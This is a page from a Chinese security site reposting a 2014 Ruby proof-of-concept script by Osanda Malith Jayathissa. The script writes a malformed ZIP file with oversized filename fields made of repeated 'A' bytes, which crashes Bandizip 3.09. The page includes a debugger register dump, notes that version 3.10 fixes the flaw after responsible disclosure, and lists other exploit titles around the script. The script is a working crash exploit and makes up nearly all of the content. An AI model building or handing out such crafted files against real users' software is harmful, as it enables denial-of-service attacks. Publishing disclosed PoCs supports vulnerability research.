首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Bandizip 3.09 Crash Proof Of Concept
来源:osandajayathissagmail.com 作者:Malith 发布时间:2014-02-11  
#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09 32bit and 64bit (Below versions might be affected)
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit
# This issue is patched in Bandizip 3.10 after a responsible disclosure
# Open this crafted file and double click on it in the app it self

=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Ensure we have valid ZIP Header
lf_header =  "\x50\x4B\x03\x04\x14\x00\x00" 
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" #file size
lf_header += "\x00\x00\x00"

cdf_header =  "\x50\x4B\x01\x02\x14\x00\x14" 
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" 
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive
eofcdf_header += "\x00\x00"

# Our Payload
payload = "A" * 4064
payload += ".txt"

Exploit = lf_header + payload + cdf_header + payload + eofcdf_header

f=File.open('bandizip.zip', 'w')
f.write(Exploit)
f.close
#EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kloxo SQL Injection / Remote C
·Inteno DG301 Remote Command Ex
·Windows TrackPopupMenuEx Win32
·Android Browser and WebView ad
·Windows Command Shell Upgrade
·Pandora FMS Remote Code Execut
·KingScada kxClientDownload.ocx
·Asseco SEE iBank FX Client 2.0
·Apache Commons FileUpload and
·OneHTTPD 0.8 - Crash PoC
·Easy CD-DA Recorder PLS Buffer
·VLC 2.1.2 (.asf) - Crash PoC
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved